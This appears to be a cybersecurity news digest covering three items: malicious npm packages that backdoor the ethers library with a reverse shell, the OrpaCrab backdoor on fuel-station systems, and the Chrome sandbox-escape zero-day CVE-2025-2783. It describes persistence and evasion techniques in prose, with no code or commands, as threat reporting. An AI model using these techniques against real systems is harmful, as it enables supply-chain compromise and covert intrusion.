Malicious NPM Packages Inject Persistent Backdoors into Trusted Libraries
Two newly discovered npm packages, ethers-provider2, and ethers-providerz, were found to be intentionally designed to compromise trusted libraries installed in a developer’s local environment. Once installed, these packages acted as downloaders that retrieved a second-stage payload from a remote server, executed it, and then deleted the file to avoid leaving forensic evidence. The second-stage payload continuously monitored the system for the presence of the ethers package and, once detected, altered a core file (provider-jsonrpc[.]js) with a trojanized version that silently fetched and ran a third-stage payload. This final payload opened a reverse shell connection to the attacker’s server using a modified SSH client, granting remote access while mimicking legitimate behavior. Even after uninstalling the malicious package, the backdoor persisted because the changes were made directly to the legitimate ethers package, effectively embedding the threat within a trusted component. The ethers-providerz package, while less effective due to early implementation errors, exhibited similar behavior by targeting the @ethersproject/providers package. Its code attempted to modify another key file, believed to be loader[.]js, to inject a reverse shell connection to the same external server. Reversinglabs researchers believe these packages are part of a more extensive campaign, with two additional packages—reproduction-hardhat and @theoretical123/providers—identified as potentially related. The goal of this campaign is clear: establish long-term, hard-to-detect persistence in developer environments by corrupting widely used packages. Even though download numbers were low, the technique demonstrates a serious escalation in software supply chain attacks, where malware hides in post-installation modifications to bypass detection and survive basic cleanup efforts.
OrpaCrab Malware Targets Industrial Systems with Covert Communications
Researchers have identified a new Linux-based backdoor named OrpaCrab, targeting industrial systems tied to ORPAK, a company active in fuel station and oil transport technology. First seen in a sample uploaded from the U.S. in early 2024, the malware is tailored to evade detection and maintain access within compromised environments. OrpaCrab achieves persistence by placing an autostart script in the /etc/rc3.d/ directory and encrypts its configuration using AES-256-CBC, making forensic analysis more difficult. It also abuses DNS over HTTPS (DoH) to resolve its command-and-control (C2) domains, sidestepping traditional DNS logging and filtering mechanisms. The most notable trait is its use of the MQTT protocol for C2 communication, allowing malicious traffic to masquerade as legitimate telemetry data, which is commonly used in industrial environments. Further analysis revealed potential ties between OrpaCrab and the CyberAv3ngers threat group, known for attacks on water systems using Unitronics PLCs. This time, researchers found OrpaCrab embedded in a Gasboy payment terminal, indicating attackers had access to payment infrastructure with the potential to disrupt fuel services or harvest payment data. The group’s shift toward fuel systems suggests a widening scope in their campaign against critical infrastructure. The backdoor’s ability to operate quietly using industry-standard protocols raises the stakes for operational technology security, where traditional monitoring solutions often overlook these communication channels. This discovery underscores the urgent need for energy and transportation sectors to enhance visibility into OT environments and secure all communication layers, not just traditional IT endpoints.
Chrome Zero-Day Exploited in Operation ForumTroll Targeting Russian Organizations
Google has issued an out-of-band patch for a critical Chrome vulnerability, tracked as CVE-2025-2783, actively exploited in a targeted espionage campaign dubbed Operation ForumTroll. Discovered by Kaspersky researchers, the flaw stems from an "incorrect handle" in Mojo, Chrome's inter-process communication layer on Windows, which allowed attackers to bypass the browser's sandbox protection entirely. This sandbox escape was triggered when victims opened personalized phishing emails posing as invitations to the "Primakov Readings" forum, leading them to malicious websites that infected systems without further interaction. The campaign was highly targeted, focusing on Russian media outlets, educational institutions, and government bodies. The short-lived phishing links were crafted for specific targets, making the attacks difficult to detect and analyze. Kaspersky confirmed that a second, unidentified exploit was used alongside CVE-2025-2783 to achieve remote code execution, though this second-stage component has not yet been recovered. The combination of a sandbox bypass and a remote execution mechanism indicates a sophisticated and likely state-sponsored threat actor. Despite the lack of technical details from Google, the coordinated disclosure and rapid patch rollout in Chrome version 134.0.6998.178 closed the vulnerability and disrupted the exploit chain. The malware in these attacks displayed advanced functionality consistent with long-term surveillance goals, reinforcing the campaign’s alignment with espionage motives. Users of Chromium-based browsers, including Edge, Brave, Opera, and Vivaldi, are advised to apply security updates immediately to prevent similar exploitation.
